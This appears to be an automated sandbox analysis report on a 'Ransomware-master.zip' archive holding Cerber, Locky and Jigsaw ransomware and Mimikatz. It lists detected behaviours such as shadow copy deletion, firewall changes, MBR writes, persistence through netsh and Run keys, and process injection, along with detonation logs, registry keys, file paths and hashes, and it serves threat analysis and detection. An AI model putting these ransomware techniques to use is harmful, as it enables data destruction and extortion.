Malware Analysis Report

2025-01-02 14:53

Sample ID 241128-2gc4astjdt
Target Ransomware-master.zip
SHA256 3e2ba9a25e9891c6dcb75ad73c1262d523e09f0eb3d095ede9ea9d11f42ebc28
Tags
discovery cerber evasion persistence privilege_escalation ransomware jigsaw spyware stealer mimikatz bootkit locky upx execution defense_evasion impact
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3e2ba9a25e9891c6dcb75ad73c1262d523e09f0eb3d095ede9ea9d11f42ebc28

Threat Level: Known bad

The file Ransomware-master.zip was found to be: Known bad.

Malicious Activity Summary

discovery cerber evasion persistence privilege_escalation ransomware jigsaw spyware stealer mimikatz bootkit locky upx execution defense_evasion impact

Mimikatz

Locky family

Cerber

Jigsaw family

Locky

Cerber family

Jigsaw Ransomware

Mimikatz family

Renames multiple (2029) files with added filename extension

mimikatz is an open source tool to dump credentials on Windows

Renames multiple (3738) files with added filename extension

Deletes shadow copies

Contacts a large (1097) amount of remote hosts

Contacts a large (1100) amount of remote hosts

Blocklisted process makes network request

Modifies Windows Firewall

Command and Scripting Interpreter: PowerShell

Drops startup file

Reads user/profile data of web browsers

Deletes itself

Checks computer location settings

Loads dropped DLL

Executes dropped EXE

Looks up external IP address via web service

Adds Run key to start application

Drops desktop.ini file(s)

Writes to the Master Boot Record (MBR)

UPX packed file

Suspicious use of SetThreadContext

Sets desktop wallpaper using registry

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Unsigned PE

System Network Configuration Discovery: Internet Connection Discovery

System Location Discovery: System Language Discovery

Program crash

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

Uses Volume Shadow Copy service COM API

Modifies Internet Explorer settings

Runs ping.exe

Suspicious behavior: MapViewOfSection

Scheduled Task/Job: Scheduled Task

Interacts with shadow copies

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Kills process with taskkill

Suspicious use of WriteProcessMemory

Suspicious use of UnmapMainImage

Opens file in notepad (likely ransom note)

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-11-28 22:32

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral24

Detonation Overview

Submitted

2024-11-28 22:32

Reported

2024-11-28 22:35

Platform

win10v2004-20241007-en

Max time kernel

91s

Max time network

136s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\test.py

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\test.py

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 72.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp

Files

N/A

Analysis: behavioral25

Detonation Overview

Submitted

2024-11-28 22:32

Reported

2024-11-28 22:35

Platform

win7-20240903-en

Max time kernel

122s

Max time network

123s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\test2.py

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\test2.py

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\Ransomware-master\test2.py

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Ransomware-master\test2.py"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 27b941118e409b2d6e33cba39ef6edb0
SHA1 79d2c3915bd94ccb79a9173167b35aa7d8aa7897
SHA256 05536bffe91a122ed7817e0409e431022c05d87da147304634ec7eaa2774eeba
SHA512 568101a5abb9842a0a47e0250028a33ff230a7c260aafcff4bfc7a395eb5c84e42e07508538d333232bbedab54d8fcd6b6f6040c54b7bd9013afd41305907ca2

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-28 22:32

Reported

2024-11-28 22:35

Platform

win7-20240903-en

Max time kernel

118s

Max time network

131s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cerber.exe"

Signatures

Cerber

ransomware cerber

Cerber family

cerber

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A

Contacts a large (1097) amount of remote hosts

discovery

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\word\startup\ C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\steam C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\documents C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\desktop C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\steam C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpDAF4.bmp" C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification \??\c:\program files (x86)\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\ C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files\ C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\steam C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\ C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\steam C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\steam C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\steam C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\desktop C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\desktop C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\documents C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\NOTEPAD.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\NOTEPAD.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2148 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
